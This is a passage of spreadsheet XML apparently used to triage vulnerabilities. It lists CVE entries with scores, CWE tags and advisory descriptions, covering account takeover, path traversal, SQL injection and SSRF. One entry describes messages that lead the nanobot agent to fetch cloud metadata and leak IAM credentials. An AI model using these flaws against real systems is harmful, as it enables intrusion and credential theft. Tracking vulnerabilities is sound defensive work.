      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate username case sensitivity during SAML authentication, allowing attackers to authenticate as different users by registering IdP accounts with accent or case variants of victim usernames. Attackers can exploit the default utf8mb4_unicode_ci database collation to bypass username matching and achieve account takeover through federated login paths including SAML, LDAP, and OAuth.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86770</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90608</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Totolink A3002MU Hh-B20211125.1046. The affected element is the function formPortFw of the file /boafrm/formPortFw of the component boa. This manipulation of the argument service_type causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90608</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90932</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>LaraDashboard versions 0.9.2 through 1.2.2 contain a path traversal vulnerability in the core-upgrade backup handling. CoreUpgradeController and BackupService (e.g. BackupService::deleteBackup()) concatenate the user-supplied backup_file/filename value directly onto the backup directory path without normalisation, without applying basename(), and without verifying that the resolved path remains inside storage/app/core-backups; the corresponding form requests only validate the value as a bounded string. An authenticated user holding only the delegated settings.edit permission (not Superadmin) can supply ../ traversal sequences to delete arbitrary files reachable on the host filesystem, including outside the application tree, or to restore a ZIP archive from an arbitrary on-disk location, writing arbitrary files into the application directories and achieving remote code execution. Note: the advisory states the vulnerable concatenation was introduced in the v0.9.7 release line. No patched version was available at the time of publication.</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90932</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91098</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91098</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91105</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91105</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92576</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>HKUDS nanobot before 0.3.0 contains a server-side request forgery vulnerability in the WebFetchTool component where the _validate_url() function fails to block internal IP ranges and private addresses. Attackers can send messages instructing the bot to fetch cloud metadata endpoints, localhost services, and RFC 1918 addresses to extract IAM credentials and internal service data.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92576</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55072</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-89</t>
        </is>
      </c>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 2026.1.5, an authenticated user with the objects permission can submit a malicious ClassDefinition UID because the name and ID validation expressions in models/DataObject/ClassDefinition.php validate only the beginning of each value. When a data object of that class containing a Block field is loaded, Block::load in models/DataObject/ClassDefinition/Data/Block.php incorporates the stored class ID into an unquoted object table identifier, allowing the UID to supply SQL syntax. The resulting query can read or modify arbitrary Pimcore database tables, including disclosure of password hashes, and the flaw represents an incomplete validation hardening because earlier work added a start anchor without enforcing the end of the identifier. This issue is fixed in version 2026.1.5.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55072</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70341</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Edge (Chromium-based) allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70341</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76412</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the remote diagnostics debugger of Cisco Secure FMC Software could allow an authenticated, remote attacker to enable the remote diagnostics debugger service.
This vulnerability is due to an error when checking the privilege level of a user who is invoking remote diagnostics. An attacker could exploit this vulnerability by authenticating to the device, either through the web-based management interface or the REST API, and using the remote diagnostics debugger to grant a user elevated privileges. A successful exploit could allow the attacker to elevate privileges to root.
Notes:
To exploit this vulnerability, the attacker must have valid user credentials on the affected device.
The CVSSv3.1 Attack Complexity is High due to the multistage process required to fully exploit this vulnerability.</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76412</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79708</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 19.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions could have allowed an authenticated user with developer permissions to execute a policy test pipeline on projects within their group and access protected CI/CD variables restricted to higher-privileged roles, due to insufficient scope validation.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79708</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80436</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service by deleting arbitrary RabbitMQ queues or exchanges due to improper authorization.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80436</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81207</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 allows any authenticated tenant — with no project membership or role — fully controls scheme/host/port/path of an outbound fetch originating from a shared-infrastructure pod, and the WSDL body is reflected verbatim to the caller. The ds-canvas pod sits on the OpenShift overlay with reach to co-tenant services, in-cluster CP4D APIs, and link-local addresses. Scope is Changed, confidentiality High (response-reflecting), integrity Low (GET-only side-effects).</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81207</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81540</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to overwrite ruleset files belonging to other tenants due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81540</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86359</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>Dell Repository Manager, versions prior to 3.5.2, contains an Incorrect Default Permissions vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86359</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87023</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87023</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
